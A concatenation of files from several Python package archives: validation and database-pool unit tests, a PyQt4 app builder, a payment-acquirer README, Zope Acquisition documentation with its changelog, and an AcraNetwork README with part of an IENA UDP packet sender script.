IntField,
StrField,
InvalidFieldException,
BadReq,
check,
)
from acolyte.testing.core.mgr_define import TestFlowMeta
class RuleTestCase(EasemobFlowTestCase):
def testIntField(self):
"""测试IntField类型的规则
"""
int_field = IntField("age", min_=6, max_=100)
# 值正常的时候
self.assertEqual(int_field(99), 99)
self.assertEqual(int_field("10"), 10)
# 类型不匹配
with self.assertRaises(InvalidFieldException) as raise_ctx:
int_field("nidaye")
self._assert_invalid_f(
raise_ctx.exception, "age", "nidaye", "invalid_type", "int")
# 大小不匹配
with self.assertRaises(InvalidFieldException) as raise_ctx:
int_field(-1)
self._assert_invalid_f(
raise_ctx.exception, "age", -1, "less_than_min", 6)
with self.assertRaises(InvalidFieldException) as raise_ctx:
int_field(101)
self._assert_invalid_f(
raise_ctx.exception, "age", 101, "more_than_max", 100)
# 自定义检查逻辑
def _my_check(field_name, age):
if age % 2 != 0:
raise InvalidFieldException(
field_name, age, "invalid_age", "even")
int_field = IntField("age", min_=6, max_=100, check_logic=_my_check)
# 值正确的情况
self.assertEqual(int_field(6), 6)
self.assertEqual(int_field(100), 100)
# 值不正确的情况
with self.assertRaises(InvalidFieldException) as raise_ctx:
int_field(7)
self._assert_invalid_f(
raise_ctx.exception, "age", 7, "invalid_age", "even")
# required but value is None
with self.assertRaises(InvalidFieldException) as raise_ctx:
int_field(None)
self._assert_invalid_f(raise_ctx.exception, "age", None, "empty", "")
# not required and value is None
int_rule = IntField("age", False, default=6)
self.assertEqual(int_rule(None), 6)
def testStrField(self):
"""测试StrField类型的规则
"""
def _my_check(field_name, value):
parts = value.split("@")[-1].split(".")
if len(parts) != 2:
raise InvalidFieldException(
field_name, value, "invalid_parts", 2)
str_field = StrField(
name="email",
required=True,
min_len=6,
max_len=100,
regex=r'^[\w.-]+@[\w.-]+.\w+$',
check_logic=_my_check
)
# 正常检查
self.assertEqual(str_field("[email protected]"), "[email protected]")
# 太短
with self.assertRaises(InvalidFieldException) as raise_ctx:
str_field("[email protected]")
self._assert_invalid_f(
raise_ctx.exception, "email", "[email protected]", "less_than_min_length", 6)
# 太长
with self.assertRaises(InvalidFieldException) as raise_ctx:
str_field("z@z." + "c" * 100)
self._assert_invalid_f(
raise_ctx.exception, "email", "z@z." + "c" * 100,
"more_than_max_length", 100)
# 不符合正则
with self.assertRaises(InvalidFieldException) as raise_ctx:
str_field("nidayehehe")
self._assert_invalid_f(raise_ctx.exception, "email",
"nidayehehe", "invalid_format",
r'^[\w.-]+@[\w.-]+.\w+$')
# 不符合自定义的检查规则
with self.assertRaises(InvalidFieldException) as raise_ctx:
str_field("[email protected]")
self._assert_invalid_f(
raise_ctx.exception, "email", "[email protected]", "invalid_parts", 2)
# required but value is None
with self.assertRaises(InvalidFieldException) as raise_ctx:
str_field(None)
self._assert_invalid_f(
raise_ctx.exception, "email", None, "empty", "")
# not requied and value is None
str_rule = StrField("name", required=False, default="Jack")
self.assertEqual(str_rule(None), "Jack")
def _assert_invalid_f(self, exc, field_name, value, reason, expect):
"""assert InvalidFieldException
"""
self.assertEqual(exc.field_name, field_name)
self.assertEqual(exc.value, value)
self.assertEqual(exc.reason, reason)
self.assertEqual(exc.expect, expect)
class CheckDecoratorTestCase(EasemobFlowTestCase):
"""针对check decorator的测试
"""
def setUp(self):
self.messages = {
"zh_CN": {
"AService": {
"a": {
}
},
"BService": {
"b": {
"invalid_id": "不合法的ID值'{id}'"
}
}
}
}
def testCommon(self):
"""测试check decorator的常规使用
"""
class AService:
@check(
IntField("id", required=True, min_=6, max_=100),
StrField("name", required=True, min_len=3, max_len=20),
StrField("grade", required=False, default="X",
regex=r'^[A-Z]$'),
messages=self.messages
)
def a(self, id: int, name: str, grade: str) -> typing.Tuple:
return id, name, grade
a = AService()
# 普通传参
self.assertEqual(a.a(6, "Sam", "A"), (6, "Sam", "A"))
# 完全字典传参
self.assertEqual(a.a(id=6, name="Sam", grade=None), (6, "Sam", "X"))
# 混合传参
self.assertEqual(a.a(10, "Jack", grade="B"), (10, "Jack", "B"))
# 出错
# 不需要渲染msg的情况
rs = a.a(None, "Sam", None)
self.assertEqual(rs.status_code, 400)
self.assertEqual(rs.reason, "id_empty")
self.assertEqual(rs.msg, "id参数不能为空")
# 需要渲染msg的情况
rs = a.a(1, "Jack", None)
self.assertEqual(rs.status_code, 400)
self.assertEqual(rs.reason, "id_less_than_min")
self.assertEqual(rs.msg, "id参数不能小于6")
def testBadReq(self):
"""测试BadReq异常
"""
class BService:
@check(
IntField("id"),
messages=self.messages
)
def b(self, id):
if id < 1:
raise BadReq("invalid_id", id=id)
b = BService()
rs = b.b(0)
self.assertEqual(rs.status_code, 400)
self.assertEqual(rs.reason, "invalid_id")
self.assertEqual(rs.msg, "不合法的ID值'0'")
class DeclareArgsDecoratorTestCase(EasemobFlowTestCase):
def testDeclareArgs(self):
"""测试被declare_args注解所修饰的方法
"""
tmf = TestFlowMeta()
self.assertEqual(len(tmf.on_start.field_rules), 2) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/util/validate.py | validate.py |
import re
import datetime
from acolyte.testing import EasemobFlowTestCase
from acolyte.util import lang, time
class DictClass:
def __init__(self, id_, name, birth, grade):
self.id_ = id_
self.name = name
self.birth = birth
self.grade = grade
class SlotsClass:
__slots__ = "id_", "name", "birth"
def __init__(self, id_, name, birth):
self.id_ = id_
self.name = name
self.birth = birth
PATTERN = re.compile("<(.*)>")
class ToStrTestCase(EasemobFlowTestCase):
"""测试lang.to_str函数
"""
def setUp(self):
self._dict_obj = DictClass(1, "SamChi", "1989-11-07", 2)
self._slots_obj = SlotsClass(1, "Jackson", "1989-11-07")
def testToStringWithTargetFields(self):
"""lang.to_str 指定fields的情形
"""
string = lang.to_str(self._dict_obj, "name", "birth", "grade")
self._check_parts_num(string, 3)
string = lang.to_str(self._slots_obj, "name", "birth")
self._check_parts_num(string, 2)
def testToStringWithoutTargetFields(self):
"""lang.to_str 不指定fields的情形
"""
string = lang.to_str(self._dict_obj)
self._check_parts_num(string, 4)
string = lang.to_str(self._slots_obj)
self._check_parts_num(string, 3)
def testWithCallback(self):
"""lang.to_str field中包含callback的情况
"""
dict_obj = DictClass(1, "SamChi", datetime.datetime.now(), 2)
string = lang.to_str(dict_obj,
"name", ("birth", time.common_fmt_dt), "grade")
print(string)
def _check_parts_num(self, string, expected_num):
parts = PATTERN.search(string).group(1).split(',')
self.assertEqual(len(parts), expected_num)
class GetFromNestedDictTestCase:
def testCommon(self):
d = {
"a": {
"b": {
"c": {
"e": 2
}
}
}
}
self.assertEqual(lang.get_from_nested_dict(d, "a", "b", "c", "e"), 2)
self.assertIsNone(lang.get_from_nested_dict(d, "a", "h"), None) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/util/lang.py | lang.py |
import time
import threading
from acolyte.testing import EasemobFlowTestCase
from acolyte.util.db import ConnectionPool
class DBPoolTestCase(EasemobFlowTestCase):
"""数据库连接池测试用例
"""
def testCommonQuery(self):
connect_config = {
"host": "localhost",
"port": 3306,
"user": "root",
"password": "",
"db": "easemob_flow",
"charset": "utf8"
}
count = 0
cdt = threading.Condition()
def query_():
nonlocal count
with pool.connection() as conn:
with conn.cursor() as csr:
csr.execute("select 1", tuple())
result = csr.fetchone()
print(result)
self.assertEqual(result, {"1": 1})
with cdt:
count += 1
cdt.notify_all()
pool = ConnectionPool(connect_config, max_pool_size=2)
for _ in range(10):
threading.Thread(target=query_).start()
with cdt:
while count < 10:
cdt.wait()
cdt = threading.Condition()
count = 0
def _fight_for_lock(sleep_time):
"""锁争夺
"""
nonlocal pool
nonlocal count
with pool.lock("nidaye"):
print("Thread '{thread_name}' get the lock!".format(
thread_name=threading.currentThread().name))
time.sleep(sleep_time)
print("Thread '{thread_name}' release the lock!".format(
thread_name=threading.currentThread().name))
with cdt:
count += 1
cdt.notify_all()
for i in range(5):
t = threading.Thread(target=_fight_for_lock, args=(0.5,))
t.name = "hehe %d" % i
t.start()
with cdt:
while count < 5:
cdt.wait()
def _fight_for_try_lock(sleep_time):
"""测试try lock的情况
"""
nonlocal pool
nonlocal self
with pool.lock("hehe", 0) as lock_rs:
self.assertTrue(lock_rs)
print("Thread '{thread_name}' get the hehe lock".format(
thread_name=threading.currentThread().name))
time.sleep(sleep_time)
print("Thread '{thread_name}' release the hehe lock!".format(
thread_name=threading.currentThread().name))
t = threading.Thread(target=_fight_for_try_lock, args=(1,))
t.name = "hehe-x"
t.start()
with pool.lock("hehe", 0) as lock_rs:
self.assertFalse(lock_rs)
t.join() | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/util/db.py | db.py |
from PyQt4.QtGui import QApplication
from .forms import Form
import sys
def _get_static_file():
root_static_path = 'static/'
return root_static_path
def _get_default_name():
return 'Application Name'
def _get_default_css():
css = """
#main_window{background: #FFF;}
"""
return css
class App(object):
def __init__(self, name=None):
self.with_css = False
if name is not None:
self.name = name
if self.name == '':
self.name = _get_default_name()
return
self.name = _get_default_name()
def application(self, type_app='form'):
if type_app == 'form':
pass
print type_app
def create_app(self, width, height, width_fix, with_css):
app = QApplication(sys.argv)
form = Form(width, height, self.name, width_fix)
form.create_form_gui('main_window')
form.add_input_field('Nombre')
form.show()
css_path = _get_static_file()
def_css = _get_default_css()
if with_css:
try:
with open('{}css/style.css'.format(css_path), 'r') as t:
tema = t.read()
app.setStyleSheet(tema)
except:
print "css file not found, loading default css styles"
app.setStyleSheet(def_css)
else:
app.setStyleSheet(def_css)
app.setStyle('cleanlooks')
sys.exit(app.exec_())
def run(self,
width=None,
height=None,
width_fixed=False,
load_css=False,
is_form=True):
width_app, height_app, width_fixed_app = 400, 600, False
if width is not None:
width_app = width
if height is not None:
height_app = height
if width_fixed is not False:
width_fixed_app = width_fixed
if load_css:
self.with_css = load_css
self.create_app(width_app, height_app, width_fixed_app, self.with_css) | Acordeon | /Acordeon-0.1.tar.gz/Acordeon-0.1/acordeon/create_app.py | create_app.py |
# Acquirers

[](https://pypi.org/project/Acquirers/)
## Who uses this module
- http://www.procdn.net
- http://www.gocloud.ru
- http://www.glavpodcast.ru
- http://www.zettadns.com
## Supported Acquirers
- [A-3](https://www.a-3.ru)
- [Tinkoff](https://oplata.tinkoff.ru/landing/develop/documentation/processing_payment)
- [Robokassa](https://robokassa.ru)
## Install
```shell
pip install Acquirers
```
## Tinkoff
API Documnetation: https://oplata.tinkoff.ru/landing/develop/documentation/processing_payment
```python
from Acquirers.Tinkoff import TinkoffSimplePayment
t = TinkoffSimplePayment(terminal_id, password)
t.init(tr.id, amount_tinkoff)
```
Result
```json
{
"Success": true,
"ErrorCode": "0",
"TerminalKey": "1520095906182DEMO",
"Status": "NEW",
"PaymentId": "14458036",
"OrderId": "02eb4dae-ec1e-44b2-844f-4e5c21e0bb88",
"Amount": 100,
"PaymentURL": "https://securepay.tinkoff.ru/pX81zg"
}
```
## Yandex.kassa
API Doc: https://kassa.yandex.ru/developers/api
## Rocketpay
```python
from Acquirers.Rocketpay import RocketpaySimplePayment
rp = RocketpaySimplePayment()
rp.merchant_id = '4'
rp.terminal_id = '4'
rp.secret_key = '265af92d-1ed8-433b-8c54-fa02a45f1227'
```
Инициируем платёж
```python
rp.init(order_id="example", amount="1.0")
```
| Acquirers | /Acquirers-0.0.7.tar.gz/Acquirers-0.0.7/README.md | README.md |
Environmental Acquisiton
========================
This package implements "environmental acquisiton" for Python, as
proposed in the OOPSLA96_ paper by Joseph Gil and David H. Lorenz:
We propose a new programming paradigm, environmental acquisition in
the context of object aggregation, in which objects acquire
behaviour from their current containers at runtime. The key idea is
that the behaviour of a component may depend upon its enclosing
composite(s). In particular, we propose a form of feature sharing in
which an object "inherits" features from the classes of objects in
its environment. By examining the declaration of classes, it is
possible to determine which kinds of classes may contain a
component, and which components must be contained in a given kind of
composite. These relationships are the basis for language constructs
that supports acquisition.
.. _OOPSLA96: http://www.cs.virginia.edu/~lorenz/papers/oopsla96/>`_:
.. contents::
Introductory Example
--------------------
Zope implements acquisition with "Extension Class" mix-in classes. To
use acquisition your classes must inherit from an acquisition base
class. For example::
>>> import ExtensionClass, Acquisition
>>> class C(ExtensionClass.Base):
... color = 'red'
>>> class A(Acquisition.Implicit):
... def report(self):
... print(self.color)
...
>>> a = A()
>>> c = C()
>>> c.a = a
>>> c.a.report()
red
>>> d = C()
>>> d.color = 'green'
>>> d.a = a
>>> d.a.report()
green
>>> try:
... a.report()
... except AttributeError:
... pass
... else:
... raise AssertionError('AttributeError not raised.')
The class ``A`` inherits acquisition behavior from
``Acquisition.Implicit``. The object, ``a``, "has" the color of
objects ``c`` and d when it is accessed through them, but it has no
color by itself. The object ``a`` obtains attributes from its
environment, where its environment is defined by the access path used
to reach ``a``.
Acquisition Wrappers
--------------------
When an object that supports acquisition is accessed through an
extension class instance, a special object, called an acquisition
wrapper, is returned. In the example above, the expression ``c.a``
returns an acquisition wrapper that contains references to both ``c``
and ``a``. It is this wrapper that performs attribute lookup in ``c``
when an attribute cannot be found in ``a``.
Acquisition wrappers provide access to the wrapped objects through the
attributes ``aq_parent``, ``aq_self``, ``aq_base``. Continue the
example from above::
>>> c.a.aq_parent is c
True
>>> c.a.aq_self is a
True
Explicit and Implicit Acquisition
---------------------------------
Two styles of acquisition are supported: implicit and explicit
acquisition.
Implicit acquisition
--------------------
Implicit acquisition is so named because it searches for attributes
from the environment automatically whenever an attribute cannot be
obtained directly from an object or through inheritance.
An attribute can be implicitly acquired if its name does not begin
with an underscore.
To support implicit acquisition, your class should inherit from the
mix-in class ``Acquisition.Implicit``.
Explicit Acquisition
--------------------
When explicit acquisition is used, attributes are not automatically
obtained from the environment. Instead, the method aq_acquire must be
used. For example::
>>> print(c.a.aq_acquire('color'))
red
To support explicit acquisition, your class should inherit from the
mix-in class ``Acquisition.Explicit``.
Controlling Acquisition
-----------------------
A class (or instance) can provide attribute by attribute control over
acquisition. Your should subclass from ``Acquisition.Explicit``, and set
all attributes that should be acquired to the special value
``Acquisition.Acquired``. Setting an attribute to this value also allows
inherited attributes to be overridden with acquired ones. For example::
>>> class C(Acquisition.Explicit):
... id = 1
... secret = 2
... color = Acquisition.Acquired
... __roles__ = Acquisition.Acquired
The only attributes that are automatically acquired from containing
objects are color, and ``__roles__``. Note that the ``__roles__``
attribute is acquired even though its name begins with an
underscore. In fact, the special ``Acquisition.Acquired`` value can be
used in ``Acquisition.Implicit`` objects to implicitly acquire
selected objects that smell like private objects.
Sometimes, you want to dynamically make an implicitly acquiring object
acquire explicitly. You can do this by getting the object's
aq_explicit attribute. This attribute provides the object with an
explicit wrapper that replaces the original implicit wrapper.
Filtered Acquisition
--------------------
The acquisition method, ``aq_acquire``, accepts two optional
arguments. The first of the additional arguments is a "filtering"
function that is used when considering whether to acquire an
object. The second of the additional arguments is an object that is
passed as extra data when calling the filtering function and which
defaults to ``None``. The filter function is called with five
arguments:
* The object that the aq_acquire method was called on,
* The object where an object was found,
* The name of the object, as passed to aq_acquire,
* The object found, and
* The extra data passed to aq_acquire.
If the filter returns a true object that the object found is returned,
otherwise, the acquisition search continues.
Here's an example::
>>> from Acquisition import Explicit
>>> class HandyForTesting(object):
... def __init__(self, name):
... self.name = name
... def __str__(self):
... return "%s(%s)" % (self.name, self.__class__.__name__)
... __repr__=__str__
...
>>> class E(Explicit, HandyForTesting): pass
...
>>> class Nice(HandyForTesting):
... isNice = 1
... def __str__(self):
... return HandyForTesting.__str__(self)+' and I am nice!'
... __repr__ = __str__
...
>>> a = E('a')
>>> a.b = E('b')
>>> a.b.c = E('c')
>>> a.p = Nice('spam')
>>> a.b.p = E('p')
>>> def find_nice(self, ancestor, name, object, extra):
... return hasattr(object,'isNice') and object.isNice
>>> print(a.b.c.aq_acquire('p', find_nice))
spam(Nice) and I am nice!
The filtered acquisition in the last line skips over the first
attribute it finds with the name ``p``, because the attribute doesn't
satisfy the condition given in the filter.
Filtered acquisition is rarely used in Zope.
Acquiring from Context
----------------------
Normally acquisition allows objects to acquire data from their
containers. However an object can acquire from objects that aren't its
containers.
Most of the examples we've seen so far show establishing of an
acquisition context using getattr semantics. For example, ``a.b`` is a
reference to ``b`` in the context of ``a``.
You can also manually set acquisition context using the ``__of__``
method. For example::
>>> from Acquisition import Implicit
>>> class C(Implicit): pass
...
>>> a = C()
>>> b = C()
>>> a.color = "red"
>>> print(b.__of__(a).color)
red
In this case, ``a`` does not contain ``b``, but it is put in ``b``'s
context using the ``__of__`` method.
Here's another subtler example that shows how you can construct an
acquisition context that includes non-container objects::
>>> from Acquisition import Implicit
>>> class C(Implicit):
... def __init__(self, name):
... self.name = name
>>> a = C("a")
>>> a.b = C("b")
>>> a.b.color = "red"
>>> a.x = C("x")
>>> print(a.b.x.color)
red
Even though ``b`` does not contain ``x``, ``x`` can acquire the color
attribute from ``b``. This works because in this case, ``x`` is accessed
in the context of ``b`` even though it is not contained by ``b``.
Here acquisition context is defined by the objects used to access
another object.
Containment Before Context
--------------------------
If in the example above suppose both a and b have an color attribute::
>>> a = C("a")
>>> a.color = "green"
>>> a.b = C("b")
>>> a.b.color = "red"
>>> a.x = C("x")
>>> print(a.b.x.color)
green
Why does ``a.b.x.color`` acquire color from ``a`` and not from ``b``?
The answer is that an object acquires from its containers before
non-containers in its context.
To see why consider this example in terms of expressions using the
``__of__`` method::
a.x -> x.__of__(a)
a.b -> b.__of__(a)
a.b.x -> x.__of__(a).__of__(b.__of__(a))
Keep in mind that attribute lookup in a wrapper is done by trying to
look up the attribute in the wrapped object first and then in the
parent object. So in the expressions above proceeds from left to
right.
The upshot of these rules is that attributes are looked up by
containment before context.
This rule holds true also for more complex examples. For example,
``a.b.c.d.e.f.g.attribute`` would search for attribute in ``g`` and
all its containers first. (Containers are searched in order from the
innermost parent to the outermost container.) If the attribute is not
found in ``g`` or any of its containers, then the search moves to
``f`` and all its containers, and so on.
Additional Attributes and Methods
---------------------------------
You can use the special method ``aq_inner`` to access an object
wrapped only by containment. So in the example above,
``a.b.x.aq_inner`` is equivalent to ``a.x``.
You can find out the acquisition context of an object using the
aq_chain method like so:
>>> [obj.name for obj in a.b.x.aq_chain]
['x', 'b', 'a']
You can find out if an object is in the containment context of another
object using the ``aq_inContextOf`` method. For example:
>>> a.b.aq_inContextOf(a)
True
.. Note: as of this writing the aq_inContextOf examples don't work the
way they should be working. According to Jim, this is because
aq_inContextOf works by comparing object pointer addresses, which
(because they are actually different wrapper objects) doesn't give
you the expected results. He acknowledges that this behavior is
controversial, and says that there is a collector entry to change
it so that you would get the answer you expect in the above. (We
just need to get to it).
Acquisition Module Functions
----------------------------
In addition to using acquisition attributes and methods directly on
objects you can use similar functions defined in the ``Acquisition``
module. These functions have the advantage that you don't need to
check to make sure that the object has the method or attribute before
calling it.
``aq_acquire(object, name [, filter, extra, explicit, default, containment])``
Acquires an object with the given name.
This function can be used to explictly acquire when using explicit
acquisition and to acquire names that wouldn't normally be
acquired.
The function accepts a number of optional arguments:
``filter``
A callable filter object that is used to decide if an object
should be acquired.
The filter is called with five arguments:
* The object that the aq_acquire method was called on,
* The object where an object was found,
* The name of the object, as passed to aq_acquire,
* The object found, and
* The extra argument passed to aq_acquire.
If the filter returns a true object that the object found is
returned, otherwise, the acquisition search continues.
``extra``
Extra data to be passed as the last argument to the filter.
``explicit``
A flag (boolean value) indicating whether explicit acquisition
should be used. The default value is true. If the flag is
true, then acquisition will proceed regardless of whether
wrappers encountered in the search of the acquisition
hierarchy are explicit or implicit wrappers. If the flag is
false, then parents of explicit wrappers are not searched.
This argument is useful if you want to apply a filter without
overriding explicit wrappers.
``default``
A default value to return if no value can be acquired.
``containment``
A flag indicating whether the search should be limited to the
containment hierarchy.
In addition, arguments can be provided as keywords.
``aq_base(object)``
Return the object with all wrapping removed.
``aq_chain(object [, containment])``
Return a list containing the object and it's acquisition
parents. The optional argument, containment, controls whether the
containment or access hierarchy is used.
``aq_get(object, name [, default, containment])``
Acquire an attribute, name. A default value can be provided, as
can a flag that limits search to the containment hierarchy.
``aq_inner(object)``
Return the object with all but the innermost layer of wrapping
removed.
``aq_parent(object)``
Return the acquisition parent of the object or None if the object
is unwrapped.
``aq_self(object)``
Return the object with one layer of wrapping removed, unless the
object is unwrapped, in which case the object is returned.
In most cases it is more convenient to use these module functions
instead of the acquisition attributes and methods directly.
Acquisition and Methods
-----------------------
Python methods of objects that support acquisition can use acquired
attributes. When a Python method is called on an object that is
wrapped by an acquisition wrapper, the wrapper is passed to the method
as the first argument. This rule also applies to user-defined method
types and to C methods defined in pure mix-in classes.
Unfortunately, C methods defined in extension base classes that define
their own data structures, cannot use aquired attributes at this
time. This is because wrapper objects do not conform to the data
structures expected by these methods. In practice, you will seldom
find this a problem.
Conclusion
----------
Acquisition provides a powerful way to dynamically share information
between objects. Zope 2 uses acquisition for a number of its key
features including security, object publishing, and DTML variable
lookup. Acquisition also provides an elegant solution to the problem
of circular references for many classes of problems. While acquisition
is powerful, you should take care when using acquisition in your
applications. The details can get complex, especially with the
differences between acquiring from context and acquiring from
containment.
Changelog
=========
4.4.4 (2017-11-24)
------------------
- add Appveyor configuration to automate building Windows eggs
4.4.3 (2017-11-23)
------------------
- Fix the extremely rare potential for a crash when the C extensions
are in use. See `issue 21 <https://github.com/zopefoundation/Acquisition/issues/21>`_.
4.4.2 (2017-05-12)
------------------
- Fixed C capsule name to fix import errors.
- Ensure our dependencies match our expactations about C extensions.
4.4.1 (2017-05-04)
------------------
- Fix C code under Python 3.4, with missing Py_XSETREF.
4.4.0 (2017-05-04)
------------------
- Enable the C extension under Python 3.
- Drop support for Python 3.3.
4.3.0 (2017-01-20)
------------------
- Make tests compatible with ExtensionClass 4.2.0.
- Drop support for Python 2.6 and 3.2.
- Add support for Python 3.5 and 3.6.
4.2.2 (2015-05-19)
------------------
- Make the pure-Python Acquirer objects cooperatively use the
superclass ``__getattribute__`` method, like the C implementation.
See https://github.com/zopefoundation/Acquisition/issues/7.
- The pure-Python implicit acquisition wrapper allows wrapped objects
to use ``object.__getattribute__(self, name)``. This differs from
the C implementation, but is important for compatibility with the
pure-Python versions of libraries like ``persistent``. See
https://github.com/zopefoundation/Acquisition/issues/9.
4.2.1 (2015-04-23)
------------------
- Correct several dangling pointer uses in the C extension,
potentially fixing a few interpreter crashes. See
https://github.com/zopefoundation/Acquisition/issues/5.
4.2 (2015-04-04)
----------------
- Add support for PyPy, PyPy3, and Python 3.2, 3.3, and 3.4.
4.1 (2014-12-18)
----------------
- Bump dependency on ``ExtensionClass`` to match current release.
4.0.3 (2014-11-02)
------------------
- Skip readme.rst tests when tests are run outside a source checkout.
4.0.2 (2014-11-02)
------------------
- Include ``*.rst`` files in the release.
4.0.1 (2014-10-30)
------------------
- Tolerate Unicode attribute names (ASCII only). LP #143358.
- Make module-level ``aq_acquire`` API respect the ``default`` parameter.
LP #1387363.
- Don't raise an attribute error for ``__iter__`` if the fallback to
``__getitem__`` succeeds. LP #1155760.
4.0 (2013-02-24)
----------------
- Added trove classifiers to project metadata.
4.0a1 (2011-12-13)
------------------
- Raise `RuntimeError: Recursion detected in acquisition wrapper` if an object
with a `__parent__` pointer points to a wrapper that in turn points to the
original object.
- Prevent wrappers to be created while accessing `__parent__` on types derived
from Explicit or Implicit base classes.
2.13.9 (2015-02-17)
-------------------
- Tolerate Unicode attribute names (ASCII only). LP #143358.
- Make module-level ``aq_acquire`` API respect the ``default`` parameter.
LP #1387363.
- Don't raise an attribute error for ``__iter__`` if the fallback to
``__getitem__`` succeeds. LP #1155760.
2.13.8 (2011-06-11)
-------------------
- Fixed a segfault on 64bit platforms when providing the `explicit` argument to
the aq_acquire method of an Acquisition wrapper. Thx to LP #675064 for the
hint to the solution. The code passed an int instead of a pointer into a
function.
2.13.7 (2011-03-02)
-------------------
- Fixed bug: When an object did not implement ``__unicode__``, calling
``unicode(wrapped)`` was calling ``__str__`` with an unwrapped ``self``.
2.13.6 (2011-02-19)
-------------------
- Add ``aq_explicit`` to ``IAcquisitionWrapper``.
- Fixed bug: ``unicode(wrapped)`` was not calling a ``__unicode__``
method on wrapped objects.
2.13.5 (2010-09-29)
-------------------
- Fixed unit tests that failed on 64bit Python on Windows machines.
2.13.4 (2010-08-31)
-------------------
- LP 623665: Fixed typo in Acquisition.h.
2.13.3 (2010-04-19)
-------------------
- Use the doctest module from the standard library and no longer depend on
zope.testing.
2.13.2 (2010-04-04)
-------------------
- Give both wrapper classes a ``__getnewargs__`` method, which causes the ZODB
optimization to fail and create persistent references using the ``_p_oid``
alone. This happens to be the persistent oid of the wrapped object. This lets
these objects to be persisted correctly, even though they are passed to the
ZODB in a wrapped state.
- Added failing tests for http://dev.plone.org/plone/ticket/10318. This shows
an edge-case where AQ wrappers can be pickled using the specific combination
of cPickle, pickle protocol one and a custom Pickler class with an
``inst_persistent_id`` hook. Unfortunately this is the exact combination used
by ZODB3.
2.13.1 (2010-02-23)
-------------------
- Update to include ExtensionClass 2.13.0.
- Fix the ``tp_name`` of the ImplicitAcquisitionWrapper and
ExplicitAcquisitionWrapper to match their Python visible names and thus have
a correct ``__name__``.
- Expand the ``tp_name`` of our extension types to hold the fully qualified
name. This ensures classes have their ``__module__`` set correctly.
2.13.0 (2010-02-14)
-------------------
- Added support for method cache in Acquisition. Patch contributed by
Yoshinori K. Okuji. See https://bugs.launchpad.net/zope2/+bug/486182.
2.12.4 (2009-10-29)
-------------------
- Fix iteration proxying to pass `self` acquisition-wrapped into both
`__iter__` as well as `__getitem__` (this fixes
https://bugs.launchpad.net/zope2/+bug/360761).
- Add tests for the __getslice__ proxying, including open-ended slicing.
2.12.3 (2009-08-08)
-------------------
- More 64-bit fixes in Py_BuildValue calls.
- More 64-bit issues fixed: Use correct integer size for slice operations.
2.12.2 (2009-08-02)
-------------------
- Fixed 64-bit compatibility issues for Python 2.5.x / 2.6.x. See
http://www.python.org/dev/peps/pep-0353/ for details.
2.12.1 (2009-04-15)
-------------------
- Update for iteration proxying: The proxy for `__iter__` must not rely on the
object to have an `__iter__` itself, but also support fall-back iteration via
`__getitem__` (this fixes https://bugs.launchpad.net/zope2/+bug/360761).
2.12 (2009-01-25)
-----------------
- Release as separate package.
| Acquisition | /Acquisition-4.4.4-cp33-cp33m-win_amd64.whl/Acquisition-4.4.4.dist-info/DESCRIPTION.rst | DESCRIPTION.rst |
AcraNetwork
===========
A collection of classes that can be used to decom network or PCM based FTI traffic
Summary
~~~~~~~
* iNetX : Class for packing and unpacking iNetX objects
* IENA : Class for packing and unpacking IENA objects
* SimpleEthernet : A simplified set of classes for Ethernet, IP and UDP packets. These are not fully featured is sufficient for the network systems used in the KAM500 networks
* Pcap : Class and helper methods for reading pcap files
* McastSocket : Class to bind to ports to capture multicast packets
Install
~~~~~~~
Install using the standard setuptools install method
.. code-block::
python setup.py install
or clone this repository to your local directory
.. code-block::
git clone https://github.com/diarmuidcwc/AcraNetwork.git
Usage
~~~~~
Here are two brief examples on how to create and read a pcap file. Further examples can be viewed in the examples
directory or in the unittest folder
To read in a pcap file with multiple ethernet packets all containing an iNetX packet wrapped in UDP
.. code-block:: python
import AcraNetwork.iNetX as inetx
import AcraNetwork.SimpleEthernet as SimpleEthernet
import AcraNetwork.Pcap as pcap
import struct
mypcap = pcap.Pcap("inetx_test.pcap") # Read the pcap file
for mypcaprecord in mypcap:
ethpacket = SimpleEthernet.Ethernet() # Create an Ethernet object
ethpacket.unpack(mypcaprecord.packet) # Unpack the pcap record into the eth object
ippacket = SimpleEthernet.IP() # Create an IP packet
ippacket.unpack(ethpacket.payload) # Unpack the ethernet payload into the IP packet
udppacket = SimpleEthernet.UDP() # Create a UDP packet
udppacket.unpack(ippacket.payload) # Unpack the IP payload into the UDP packet
inetxpacket = inetx.iNetX() # Create an iNetx object
inetxpacket.unpack(udppacket.payload) # Unpack the UDP payload into this iNetX object
print("INETX: StreamID ={:08X} Sequence = {:8d} PTP Seconds = {}".format(inetxpacket.streamid,inetxpacket.sequence,inetxpacket.ptptimeseconds))
To Make a Distribution
~~~~~~~~~~~~~~~~~~~~~~
.. code-block::
pip install --upgrade pip wheel setuptools twine
python ./setup.py bdist_wheel --universal
twine upload dist/*
| AcraNetwork | /AcraNetwork-0.16.1.tar.gz/AcraNetwork-0.16.1/README.rst | README.rst |
# -*- coding: utf-8 -*-
"""
=====
Sending IENA packets
=====
Simplified IENA packet generator. Sends one fixed size packet at the specified rate
Can be used as a base for generating more complex configurations
"""
__author__ = "Diarmuid Collins"
__copyright__ = "Copyright 2023"
__version__ = "0.1.0"
__maintainer__ = "Diarmuid Collins"
__email__ = "[email protected]"
__status__ = "Production"
import sys
sys.path.append("..")
import time
import struct
import AcraNetwork.SimpleEthernet as eth
import AcraNetwork.IENA as iena
import argparse
import socket
import signal
import datetime
def create_parser():
# Argument parser
parser = argparse.ArgumentParser(description='Send IENA packets at a specified rate')
parser.add_argument('--rate', required=False, type=float, default=1.0, help="Packet rate in Mbps")
parser.add_argument('--ipaddress', required=False, type=str, default="192.168.0.26", help="Destination IP")
return parser
def accurate_sleep(duration, get_now=time.perf_counter):
now = get_now()
end = now + duration
while now < end:
now = get_now()
def main(args):
dst_udp_port = 4444
# open a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
# Get the accurate size of the packet
FCS_LEN = 4
PREAMBLE = 8
hdr_lens = eth.UDP.UDP_HEADER_SIZE + eth.IP.IP_HEADER_SIZE + eth.Ethernet.HEADERLEN + FCS_LEN + PREAMBLE
# Work out the usecond timestamp
now = datetime.datetime.now()
seconds_since_jan1st = (now - now.replace(day=1, month=1, hour=0, minute=0, second=0, microsecond=0)).total_seconds()
useconds_since_jan1st = int(seconds_since_jan1st * 1e6)
